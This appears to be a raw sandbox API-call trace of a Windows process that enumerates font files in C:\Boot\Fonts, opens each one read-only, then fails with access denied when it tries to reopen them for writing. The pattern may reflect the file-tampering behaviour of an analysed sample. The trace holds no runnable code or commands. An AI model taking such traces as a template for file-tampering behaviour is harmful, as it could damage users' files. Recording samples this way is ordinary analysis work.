[0069.711] AreFileApisANSI () returned 1 [0069.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\malgunn_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\malgunn_boot.ttf", lpUsedDefaultChar=0x0) returned 31 [0069.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0069.712] AreFileApisANSI () returned 1 [0069.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0069.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53370 [0069.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53370, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 31 [0069.712] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.816] GetFileType (hFile=0x418) returned 0x1 [0069.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.816] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.816] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.816] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.816] CloseHandle (hObject=0x418) returned 1 [0069.817] AreFileApisANSI () returned 1 [0069.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0069.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53838 [0069.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 31 [0069.817] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.817] GetLastError () returned 0x5 [0069.817] GetLastError () returned 0x5 [0069.817] SetLastError (dwErrCode=0x5) [0069.817] GetLastError () returned 0x5 [0069.817] SetLastError (dwErrCode=0x5) [0069.817] GetLastError () returned 0x5 [0069.817] SetLastError (dwErrCode=0x5) [0069.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.817] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8f4db4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2b506, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0069.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0069.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.818] AreFileApisANSI () returned 1 [0069.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\malgun_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\malgun_boot.ttf", lpUsedDefaultChar=0x0) returned 30 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.818] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0069.818] AreFileApisANSI () returned 1 [0069.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0069.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 30 [0069.819] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.820] GetFileType (hFile=0x418) returned 0x1 [0069.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.820] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.820] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.821] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.821] CloseHandle (hObject=0x418) returned 1 [0069.821] AreFileApisANSI () returned 1 [0069.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x536d0 [0069.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Fonts\\malgun_boot.ttf") returned 30 [0069.821] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.821] GetLastError () returned 0x5 [0069.821] GetLastError () returned 0x5 [0069.821] SetLastError (dwErrCode=0x5) [0069.821] GetLastError () returned 0x5 [0069.821] SetLastError (dwErrCode=0x5) [0069.821] GetLastError () returned 0x5 [0069.821] SetLastError (dwErrCode=0x5) [0069.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.822] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9072c7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2318a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0069.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0069.823] AreFileApisANSI () returned 1 [0069.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\meiryon_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\meiryon_boot.ttf", lpUsedDefaultChar=0x0) returned 31 [0069.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0069.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.823] AreFileApisANSI () returned 1 [0069.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0069.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53298 [0069.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 31 [0069.823] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.825] GetFileType (hFile=0x418) returned 0x1 [0069.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.825] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.826] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.826] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.826] CloseHandle (hObject=0x418) returned 1 [0069.826] AreFileApisANSI () returned 1 [0069.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0069.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x534d8 [0069.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=31 | out: lpWideCharStr="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 31 [0069.826] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.826] GetLastError () returned 0x5 [0069.826] GetLastError () returned 0x5 [0069.826] SetLastError (dwErrCode=0x5) [0069.826] GetLastError () returned 0x5 [0069.826] SetLastError (dwErrCode=0x5) [0069.826] GetLastError () returned 0x5 [0069.826] SetLastError (dwErrCode=0x5) [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.827] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef918492, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2380b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0069.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.828] AreFileApisANSI () returned 1 [0069.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\meiryo_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\meiryo_boot.ttf", lpUsedDefaultChar=0x0) returned 30 [0069.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 